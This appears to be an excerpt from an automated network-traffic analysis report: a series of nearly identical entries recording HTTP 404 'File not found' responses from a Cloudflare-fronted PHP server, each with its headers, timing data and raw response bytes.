Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2I7UPVy3UGxsbRhIICyDk3czqfa%2FRN1uW2%2By%2Fw80Br6yftCuhdR0acTvkdruxlsjnVqII78GeCvpYtMpDC34FOqwNhQx%2B1UT58V3UUkPDaxvHKyzF1%2BgjugiFnc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786e8fadec424f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2159&min_rtt=2159&rtt_var=1079&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p46K3cRosd1zUvZc5vWbwHXJVnTpvJWmgiPAjw433IB3fWXI02z37c9spr5RntLUmCLRyODBznnDKTdrZYfWA41S7FGNgRjhok6%2BI3LzEh25RvWd4dEbUqLZotw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786eb4bb6b3300-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=41242&min_rtt=41242&rtt_var=20621&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vcgzxTqzpMYqjXX9haJxvqy7FUaBbrUvB7jzDwjRBoBL8vyUUy4vMtuHoO51vYJ95pQV0UYY%2FFU%2FZ%2F727BXs%2Bq9X68WC%2FG3Tbdn71QcbmiqGMUcWdG42IWeqdQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786ecd4a18333c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quElBF7cCcOl%2F%2BwYN8JpnDd%2F0bR06osETrOKfplk8GDI%2FjXho8epVR7ywj4AL3g7onaYLpIivnjjWAqWZYrSzzjjuKKLSbFFbW2TkBXO5baIhzZc7EvuhqxGPTY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786ee63c6befa5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1960&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXAnDOHqtZLg8KQef1f3x15VP4GN9dRgbPYkdAKfYZAY%2FtSUWoHP37nzK2RlZzTw8ax8U1qhTuHR%2B0YuFiAqlzo34Nzb2fiBM9tkfwufw6pTeQArDRmoKysVF84%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786ef24d3f183d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1663&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EcNCLvRAO8PnIXKu%2FxifYEj6KD1Nxx1K26MPqWNZlWz5FQAeFhZgSu9%2FvpL3SZ7q2N4Ai3kUuV%2FTj3pD25lhFh7E%2FTvhYEIt6COnLDVE5G0%2BsaSFgcjBZr1CpMI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786efe89b00f81-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1776&rtt_var=888&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FcoGXowwhxxmtL1NO6iKhVj%2FsBLqQjwfPS%2Bgn1Df%2FxpliGeTpzI7yNKPS4015OqOzOn29T9lioZTx%2BIoq93Ei1c78T38Tzgv3KgxrO68bWvmM81Q1kT7WnLKOE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f2f2e9bf791-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eTXzS%2Fr1IroS0v6Em%2Fs72VmpXXw8KI3jKlFa15pFp8pAR7tghVEtejgUiT385KW8HOv2q%2F1Cj4bASt%2FNRV61aJ7i4rP6Dg567c%2F3WpTcbx5Z6BHAl6Lz6pOze2Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f3b4c4f427f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FjOZsfkIbbfbNuJCH9kpVIctW3RXQMv1iRsaH0qcEs1DtT7To6J%2BoPSACaqzp1MwHe%2BvOTxc2FkAmis%2BE3WRHiUq9rUm0nB6vY1ThB3nmybZm7q28U0FqwmUEzk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f535e9d7ce2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1934&min_rtt=1934&rtt_var=967&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8m%2Fhv1JyDhMOpIN9hF7MSM8vkBHV7WkVVkD92qV0G2DdSVKFQp7%2FNdcpLYHpMDXd0DTK87D2nwpW1J5Inw9tJDZ04w1FXuTshj2ZjvNegooquEEISbXOpz8yU9k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f5f8a304314-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2459&min_rtt=2459&rtt_var=1229&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9VoSaVSPP5VHVj7W1yKuW8Ov1Arf5e4ERq40IPSHV0AChXsUHm%2B5ttDGdXfwpi%2FhnwGMOcLuwEsuaIIfsTcHMVq6w0Ka71SRl32p6IMvI5428fp3jbXOQB5uMo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f6b8b8bc459-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2qgVIi2oHVf3DvLEyjYhC4743qdTtEQ3u0edzmL08R8v4zplKM7Qh480c4EWzBU3G69LvY1D61L2YmeGG9umnqvRUplDB%2FmUZpGzTj3QFFMqGxk2rVisVTll4w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f77ae660f74-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bVOOXS%2FjdRngstK0e1Lv%2BQJlqAb6c12wU9OujW%2B0TBUB9uVSK%2FVMEb13pd5V5eS4M6tXZjA7UZ2GCGBbnKyA1HY6KV4Ay7mP3KVenXjGa4RiVcvYXEaIGfpD%2BiI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f83dc90334e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnWn185D5e6l3SZ0EaMhtS6RU5u7U6UP%2FqIC9UoZuDkLaqcfNLbmozsbhI9JKlxY3PzKts%2BrhXRhS2dn5BASIBMoqjJBFggt2wE1WIfMeotwljlziwKMCuMSve4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f8f2fab43f1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1827&rtt_var=913&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P4IxxRE8a2e7%2Bi33wT%2B%2B7wMIpD2ESpabixS2fkvBce8NWp9bzHbLoEHW9Itzw0GPKvo%2F6CW2Yb%2BFHAw7J1DevY6x4lRJ3rxBThJ4WmOCwwKbYlwXT5DxuSEALLA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786f9a4f0d41ff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1587&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=haZ09tag2Sdbq3tCpLHnGehgHu%2FZ8ib8bt%2ByImdVZ%2BApM1Ml%2Bk7s3qraAUjXb1bHMS41Slm6z4nd0dw%2FpFFKP1W2D2X6eWQE3kjKjHYN%2BrNrj5UpsYPiSO3EtbM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786fa668344301-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYr7bprbfCEYPbZu0NY%2FnWvr9sublDSflxH5SHfSGQH4hCmUkLkz97y6Jn8bgJfSZdJjylwjR1aANwVos2dPKPOziMh1KEn5rd9u7%2FHJohIMoNN5a%2Fg%2Bmlqy3sg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786fca6e708cb9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2076&min_rtt=2076&rtt_var=1038&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gAsXbPLrD%2FCYixf2OmIcVnyuwtHTdCchcSmjal3cV%2FjXs94wbjGklJxtB8V1hk%2B2UWAt1WRNWTxtc2JW9j3MB%2B3yt0zLNNdYOsyyCLAuCZ8xWKDkGoY9EO%2FOQ6Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786fefd923424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8cm8KYAPtKsCgxOfV%2Bxb641PHesnWFkpmhx07vvIoJhPUJb2Mn8ZOSmFMMcMmYrhKJqqQYdL9VWRALr5Yf2oV%2FxkZMLMoTRnvoEooKep5ZY24TnMfuKElSG4GiI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786ffbdbd1ef9d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3194&min_rtt=3194&rtt_var=1597&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sTsvaU7KXKHE%2F36P5MjKebTEMNP7qFqR8fO2DUQucqms%2BKBE3hJXevd4w4qZEIZb%2BwHF3iewQ7PX3y6404ZW9iKljv%2B%2FB07MaWgqidVogUH96l1IfUFUSETiZWo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91787007f9eb42f4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2492&min_rtt=2492&rtt_var=1246&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3B53RQ1pMXCtCn%2BEuV%2BPRNLMMrRm2Ez6tvc%2B5476qz9vEm%2Fs%2BVSWQI82C39KuWwNCBhIYJ9E%2Bk2SidmQ81ltSQHIeJDgQ%2FVmJDe68BpwnErL1nmAJcfPM098Jg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9178702009d442a9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1582&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=122&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OYSlbiC3czDhYc5oQ9Z7H%2FO9a%2FR5Lju%2FsvVY9%2FzklgIbZObvFM916URLi5ZNgvGsbi2oU434RYSn424k%2FYK9Xem2DqHD6F7Qr%2BnN8Pq2uBeNGaBYqyAQg7FFKo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9178702b9dca7279-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=38107&min_rtt=38107&rtt_var=19053&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVOCtsaAWHOhCWTbkSTsH6sz3KJ%2F1nHZ5dYvEqXNG3NNCfSo86Aw4O4Wd7OfRrLzKdrlzusvtSDCQte%2BSCBVzXNiSbkgePO3a9pKq5MjLBp7hK5GU%2FkqZycpSlo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91787037a85a0cba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1481&rtt_var=740&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0zHKX1uxoFTpNct%2BkOJkXQc0dDRrtnG%2BC6xTUDbGcoxWR5ImTpAf94Y2tg5yhZjswjPBBKQJzjQ8K1QZoj6wnmmGgID17Agkv%2BM9nQUdNe0rUZ5cf%2FCvjtZZ9MM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9178704fca997d18-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2042&rtt_var=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
